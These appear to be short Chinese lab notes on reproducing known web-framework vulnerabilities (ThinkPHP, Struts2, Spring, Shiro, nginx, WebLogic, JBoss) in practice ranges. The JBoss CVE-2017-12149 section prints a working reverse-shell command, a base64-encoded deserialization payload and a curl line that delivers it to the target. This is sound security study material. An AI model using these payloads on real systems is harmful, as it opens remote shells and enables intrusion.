一:ThinkPhp
1.搭建环境,访问
2.访问路径,进行远程代码执行
二:struts2
1.搭建环境进行
2.使用工具进行检测
三:Spring
1.搭建环境进行访问并进行抓包
2.然后抓取数据包,使用PATCH请求来修改
3.进入容器进行查看
4.访问靶场地址
5.填写注册信息进行抓包
6.加poc进行发送,并进到容器进行访问
四:shiro
1.搭建环境 访问靶场
2.使用shiro反序列化漏洞综合利用工具 v2.2进行访问
3.进行反弹shell并执行
五:nginx
1.搭建环境,访问靶场进行访问
2.修改cookie发送可以访问到
文件名逻辑漏洞
1.搭建环境,访问靶场
2. 创建一个php文件改后缀为.jpg,抓包并在jpg后边添加一个空格
3.放行,然后访问路径,进行抓包
4.修改2e 2e为20 00发送
六:weblogic
1.使用工具进行测试
七:JBoss
1.搭建环境,访问靶场
2.使用工具进行检测
JBoss 5.x/6.x反序列化命令执行漏洞(CVE-2017-12149)
1. 搭建环境,访问靶场,证明存在接口
2.进行漏洞利用,反弹成功
bash -i >& /dev/tcp/8.155.7.133/6666 0>&1
ComonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser
curl http://8.155.7.133:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
)
